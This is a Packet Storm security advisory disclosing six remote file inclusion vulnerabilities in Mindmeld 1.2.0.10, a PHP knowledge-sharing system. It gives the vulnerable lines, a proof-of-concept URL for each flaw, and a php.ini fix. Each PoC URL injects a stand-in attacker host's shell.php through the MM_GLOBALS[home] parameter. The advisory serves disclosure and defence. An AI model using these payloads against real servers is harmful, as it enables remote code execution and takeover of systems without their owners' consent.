exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mindmeld-rfi.txt

mindmeld-rfi.txt
Posted Feb 1, 2008
Authored by David Wharton

Mindmeld version 1.2.0.10 suffers from multiple remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, file inclusion
SHA-256 | cb08573d54c2a39d2112ffb4c3706e94eaed0a4ceec242a4422c1f01b3975986

mindmeld-rfi.txt

Change Mirror Download
Summary

Mindmeld is an, "enterprise-capable knowledge-sharing system" written
in PHP. There are multiple remote file inclusion vulnerabilities in
Mindmeld version 1.2.0.10 (latest version).

Details

1. Vulnerable File and Line:

Mindmeld-1.2.0.10/acweb/admin_index.php: line 51
require_once ( $MM_GLOBALS['home']."include/utilities.inc" );

PoC:

http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
2. Vulnerable file and line:

Mindmeld-1.2.0.10/include/ask.inc.php: line 34
require_once ( $MM_GLOBALS['home'] . "interfaces
{$MM_GLOBALS['interface']}/include/" .
"interface_{$MM_GLOBALS['interface']}_ask.inc" );

PoC:

http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://
shell_server/shell.php?php?

---
3. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/learn.inc.php: line 38
require_once ( $MM_GLOBALS['home'] . "interfaces/
{$MM_GLOBALS['interface']}/include/"

PoC:

http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
4. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/manage.inc.php: line 31
require_once ( $MM_GLOBALS['home'] . "interfaces/
{$MM_GLOBALS['interface']}/include/"

PoC:

http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
5. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/mind.inc.php: line 33
require_once( $MM_GLOBALS['home'] . 'include/utilities.inc' );

PoC:

http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
6. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/sensory.inc.php: line 70
require_once ( $MM_GLOBALS['home'] . "include/utilities.inc" );

PoC:

http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
It appears that these vulnerabilities are not vulnerable to local file
includes.

These vulnerabilities have been disclosed to the vendor although
development on this software has stopped.

Sources:

http://mindmeld.sourceforge.net/

Quick Fix:

In php.ini, disable the following variables: register_globals,
allow_url_fopen, and allow_url_include.

Credit:

David Wharton


Login or Register to add favorites

File Archive:

May 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    16 Files
  • 3
    May 3rd
    38 Files
  • 4
    May 4th
    15 Files
  • 5
    May 5th
    35 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    8 Files
  • 9
    May 9th
    65 Files
  • 10
    May 10th
    19 Files
  • 11
    May 11th
    27 Files
  • 12
    May 12th
    8 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    1 Files
  • 15
    May 15th
    19 Files
  • 16
    May 16th
    66 Files
  • 17
    May 17th
    28 Files
  • 18
    May 18th
    32 Files
  • 19
    May 19th
    13 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    23 Files
  • 23
    May 23rd
    15 Files
  • 24
    May 24th
    49 Files
  • 25
    May 25th
    20 Files
  • 26
    May 26th
    13 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close